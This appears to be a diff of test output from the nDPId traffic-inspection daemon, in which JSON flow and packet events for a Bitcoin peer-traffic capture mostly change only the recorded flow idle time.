-00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1301328090023,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328090023,"pkt":"ACNshovhACPrIpS0CABFAACdT81AAHYGdmdFdjZ6wKgBjiCN2CBFUvMhECrU24AYAQRFgAAAAQEICgA8+QknMuFU+b602XZlcnNpb24AAAAAAFUAAAACfQAAAQAAAAAAAADZsJBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHtggAQAAAAAAAAAAAAAAAAAAAAAA\/\/9FdjZ6II3xDaOK7c9BwgAGwwEA"} -00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1301328090082,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1301328090082,"pkt":"ACNshovhACPrIpS0CABFAABIT85AAHYGdrtFdjZ6wKgBjiCN2CBFUvOKECrU24AYAQQkRgAAAQEICgA8+RAnMuFV+b602XZlcmFjawAAAAAAAAAAAAA="} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328319392,"flow_last_seen":1301328319392,"flow_idle_time":7440000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328319392,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"74.89.181.229","src_port":55348,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1301328319392,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328319392,"pkt":"ACPrIpS0ACNshovhCABFAACdlslAAEAG4RzAqAGOSlm15dg0II2cIEOJr5xIoIAY\/\/\/04QAAAQEICicy6kgDS\/0c+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAAC\/sZBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/Slm15SCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/8mYIQeII2qu+Pk33arXQC9vgEA"} -00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":81,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328319392,"flow_last_seen":1301328319392,"flow_idle_time":7440000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328319392,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"74.89.181.229","src_port":55348,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1301328319451,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328319451,"pkt":"ACNshovhACPrIpS0CABFAACdR2RAAHYG+oFKWbXlwKgBjiCN2DSvnEignCBD8oAYAQSuQgAAAQEICgNL\/SInMupI+b602XZlcnNpb24AAAAAAFUAAAAAfQAAAQAAAAAAAAC4sZBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHtg0AQAAAAAAAAAAAAAAAAAAAAAA\/\/9KWbXlII1O39\/bLGJPkgAHwwEA"} -00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1301328319554,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1301328319554,"pkt":"ACNshovhACPrIpS0CABFAABIR4lAAHYG+rFKWbXlwKgBjiCN2DSvnEkJnCBD8oAYAQTU7AAAAQEICgNL\/S8nMupI+b602XZlcmFjawAAAAAAAAAAAAA="} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":201,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328472925,"flow_last_seen":1301328472925,"flow_idle_time":7440000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328472925,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"66.68.83.22","src_port":55383,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":201,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1301328472925,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328472925,"pkt":"ACPrIpS0ACNshovhCABFAACde+1AAEAGZt3AqAGOQkRTFthXII0tj7Vf9ZidkYAY\/\/+IsAAAAQEICicy8EYAAAAA+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAABYspBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/QkRTFiCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/8mYIQeII21Dgd4gTLgpgDgvgEA"} -00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":201,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328472925,"flow_last_seen":1301328472925,"flow_idle_time":7440000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328472925,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"66.68.83.22","src_port":55383,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1301328472987,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328472987,"pkt":"ACNshovhACPrIpS0CABFAACdMqtAAG8GgR9CRFMWwKgBjiCN2Ff1mJ2RLY+1yIAY\/5aM3QAAAQEICgBK7W0nMvBG+b602XZlcnNpb24AAAAAAFUAAACcfAAAAQAAAAAAAABZspBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHthXAQAAAAAAAAAAAAAAAAAAAAAA\/\/9CRFMWII0z3Rs+AfeDdwAHwwEA"} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":203,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1301328473077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1301328473077,"pkt":"ACNshovhACPrIpS0CABFAABIMqxAAG8GgXNCRFMWwKgBjiCN2Ff1mJ36LY+1yIAY\/5avrAAAAQEICgBK7W4nMvBG+b602XZlcmFjawAAAAAAAAAAAAA="} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301327937725,"flow_last_seen":1301327937725,"flow_idle_time":7560000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301327937725,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"188.165.213.169","src_port":55317,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1301327937725,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301327937725,"pkt":"ACPrIpS0ACNshovhCABFAACdb3BAAEAGdmXAqAGOvKXVqdgVII1UFpaF9ORId4AY\/\/\/XwQAAAQEICicy22Mwkrss+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAABBsJBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/vKXVqSCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/\/AqAGOII3ZMDrPGxAeDAD6vQEA"} +00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301327937725,"flow_last_seen":1301327937725,"flow_idle_time":7560000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301327937725,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"188.165.213.169","src_port":55317,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1301327937800,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301327937800,"pkt":"ACNshovhACPrIpS0CABFAACd8zJAADQG\/qK8pdWpwKgBjiCN2BX05Eh3VBaWhYAYAC7fMwAAAQEICjCSu0gnMttj+b602XZlcnNpb24AAAAAAFUAAACcfAAAAQAAAAAAAABqsJBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHtgVAQAAAAAAAAAAAAAAAAAAAAAA\/\/+8pdWpII1MLcnArv8XlgAGwwEA"} +01828{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1301327937931,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1067,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1067,"pkt_l4_len":1033,"thread_ts_msec":1301327937931,"pkt":"ACPrIpS0ACNshovhCABFAAQdZEVAAEAGfhDAqAGOvKXVqdgVII1UFpbu9ORI4IAY\/\/\/JGQAAAQEICicy22UwkrtL+b602XZlcmFjawAAAAAAAAAAAAD5vrTZZ2V0YWRkcgAAAAAAAAAAAF324OL5vrTZZ2V0YmxvY2tzAAAApQMAAGlfIuqcfAAAHKh7ybVTxuZIQjrl7yTcgS++hNhBt1zq9NegAAAAAAAA0isW7TPLR9+QJv0A5WbZVCvm695mFYsw+RcAAAAAAAAKtKqLikjG018uz8LfLAtdjFIkeP\/i1erq1gAAAAAAAJBdQRxOhTejsSgFAkOe4jLdh+MgkNThEJ18AAAAAAAAuqLvaBfSt3u\/xIqIdA14a1vMRWgufw\/9NSQAAAAAAABmO+ZaHQMV8GVsd2tLL4rFQTc0+9Vfwkt\/KAAAAAAAAJT+LTuh4xfC31zGm\/GrV7uiO60OaIRMkzcNAAAAAAAAuhdRV0aXd6Zg2v\/d1GRW41CXeTNnyZ2lADQAAAAAAADN6C3MlB3uxd0izHdkP3dhS0au0yU7AWAQZwAAAAAAAL+B7POHga71M99A8Eu3CYdV7ruvTTFqTRaEAAAAAAAA3UsnAThWfVMwqZa+fYK\/+mnwaocTsbQIG1kAAAAAAADey3zxujtbDGk\/QTgO92YcU4PswnA6nOZ6FgAAAAAAAMDzxV+Dq1G5LChOJMi\/klliIw7dOCRLUwU1AAAAAAAAPos8A4n6clF7nKE4hFivm22s790lzTk\/xUsAAAAAAAC0sS5A1Mm4fwV3yc3Q1LndsofGdqv023cDhAAAAAAAAGvuGwU2Et\/fX33Zfbvd3fo\/8TaDBcaUcU3CAAAAAAAAP2JWK5H+eMf+Pv\/jSxNvOoqfqtxRlUdLIhEAAAAAAADJveYZh3372qwQQlL9GVXITa9jJ6DXXZhGDQAAAAAAAKMYV6DpTz6VcKhTn2GDUxJn1w6c\/OztngqRAAAAAAAABDCPkjdagfw0FOqHQEeRGYOTGUOY4U7Z+TMAAAAAAABH73UkZZo8i3KUfaLV4BIT5FRuJgLU9+S6PwAAAAAAAEhKQKlsPJI3JIw8Tb+HHwelgYW13heoG+NwAAAAAAAAGoeNNbO0PKw7FoNOsSIzS8W\/U8wXt9nuho8AAAAAAADVlxLK6O44NewFXywS+BNdzYycb7g7WSY\/qQEAAAAAAKqI+qWcSpEbTrldQNWUJik+3hdENRtaz0ynBAAAAAAA\/6kPGMjbu4hU+GZN83C9X6Hc1si6bqd\/l3UhAAAAAABKw0jIrFFXJp9oPx6NizqHl5jwjXfMij2VrHIgAAAAAG\/ijAq28bNywaaiRq5j90+THoNl4VoInGjWGQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328089970,"flow_last_seen":1301328089970,"flow_idle_time":7560000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328089970,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"69.118.54.122","src_port":55328,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1301328089970,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328089970,"pkt":"ACPrIpS0ACNshovhCABFAACdrppAAEAGTZrAqAGORXY2etggII0QKtRyRVLzIYAY\/\/\/YagAAAQEICicy4VQAPPkD+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAADZsJBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/RXY2eiCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/8mYIQeII3pIMJ+i724nwBQvgEA"} +00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328089970,"flow_last_seen":1301328089970,"flow_idle_time":7560000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328089970,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"69.118.54.122","src_port":55328,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1301328090023,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328090023,"pkt":"ACNshovhACPrIpS0CABFAACdT81AAHYGdmdFdjZ6wKgBjiCN2CBFUvMhECrU24AYAQRFgAAAAQEICgA8+QknMuFU+b602XZlcnNpb24AAAAAAFUAAAACfQAAAQAAAAAAAADZsJBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHtggAQAAAAAAAAAAAAAAAAAAAAAA\/\/9FdjZ6II3xDaOK7c9BwgAGwwEA"} +00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1301328090082,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1301328090082,"pkt":"ACNshovhACPrIpS0CABFAABIT85AAHYGdrtFdjZ6wKgBjiCN2CBFUvOKECrU24AYAQQkRgAAAQEICgA8+RAnMuFV+b602XZlcmFjawAAAAAAAAAAAAA="} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328319392,"flow_last_seen":1301328319392,"flow_idle_time":7560000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328319392,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"74.89.181.229","src_port":55348,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1301328319392,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328319392,"pkt":"ACPrIpS0ACNshovhCABFAACdlslAAEAG4RzAqAGOSlm15dg0II2cIEOJr5xIoIAY\/\/\/04QAAAQEICicy6kgDS\/0c+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAAC\/sZBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/Slm15SCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/8mYIQeII2qu+Pk33arXQC9vgEA"} +00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":81,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328319392,"flow_last_seen":1301328319392,"flow_idle_time":7560000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328319392,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"74.89.181.229","src_port":55348,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1301328319451,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328319451,"pkt":"ACNshovhACPrIpS0CABFAACdR2RAAHYG+oFKWbXlwKgBjiCN2DSvnEignCBD8oAYAQSuQgAAAQEICgNL\/SInMupI+b602XZlcnNpb24AAAAAAFUAAAAAfQAAAQAAAAAAAAC4sZBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHtg0AQAAAAAAAAAAAAAAAAAAAAAA\/\/9KWbXlII1O39\/bLGJPkgAHwwEA"} +00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1301328319554,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1301328319554,"pkt":"ACNshovhACPrIpS0CABFAABIR4lAAHYG+rFKWbXlwKgBjiCN2DSvnEkJnCBD8oAYAQTU7AAAAQEICgNL\/S8nMupI+b602XZlcmFjawAAAAAAAAAAAAA="} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":201,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328472925,"flow_last_seen":1301328472925,"flow_idle_time":7560000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328472925,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"66.68.83.22","src_port":55383,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":201,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1301328472925,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328472925,"pkt":"ACPrIpS0ACNshovhCABFAACde+1AAEAGZt3AqAGOQkRTFthXII0tj7Vf9ZidkYAY\/\/+IsAAAAQEICicy8EYAAAAA+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAABYspBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/QkRTFiCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/8mYIQeII21Dgd4gTLgpgDgvgEA"} +00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":201,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328472925,"flow_last_seen":1301328472925,"flow_idle_time":7560000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328472925,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"66.68.83.22","src_port":55383,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1301328472987,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328472987,"pkt":"ACNshovhACPrIpS0CABFAACdMqtAAG8GgR9CRFMWwKgBjiCN2Ff1mJ2RLY+1yIAY\/5aM3QAAAQEICgBK7W0nMvBG+b602XZlcnNpb24AAAAAAFUAAACcfAAAAQAAAAAAAABZspBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHthXAQAAAAAAAAAAAAAAAAAAAAAA\/\/9CRFMWII0z3Rs+AfeDdwAHwwEA"} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":203,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1301328473077,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1301328473077,"pkt":"ACNshovhACPrIpS0CABFAABIMqxAAG8GgXNCRFMWwKgBjiCN2Ff1mJ36LY+1yIAY\/5avrAAAAQEICgBK7W4nMvBG+b602XZlcmFjawAAAAAAAAAAAAA="} 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":215,"source":"bitcoin.pcap","alias":"nDPId-test","packets-captured":215,"packets-processed":214,"total-skipped-flows":0,"total-l4-data-len":260266,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":4,"total-active-flows":4,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":23,"global_ts_msec":1301328538215} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":348,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328699728,"flow_last_seen":1301328699728,"flow_idle_time":7440000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328699728,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"195.218.16.178","src_port":55400,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1301328699728,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328699728,"pkt":"ACPrIpS0ACNshovhCABFAACdK9RAAEAGd8TAqAGOw9oQsthoII1BDXcu4yOzE4AY\/\/9L7wAAAQEICicy+R8AACIN+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAAA7s5BNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/w9oQsiCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/8mYIQeII38Ree1v7hQ3gC4wAEA"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":348,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328699728,"flow_last_seen":1301328699728,"flow_idle_time":7440000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328699728,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"195.218.16.178","src_port":55400,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 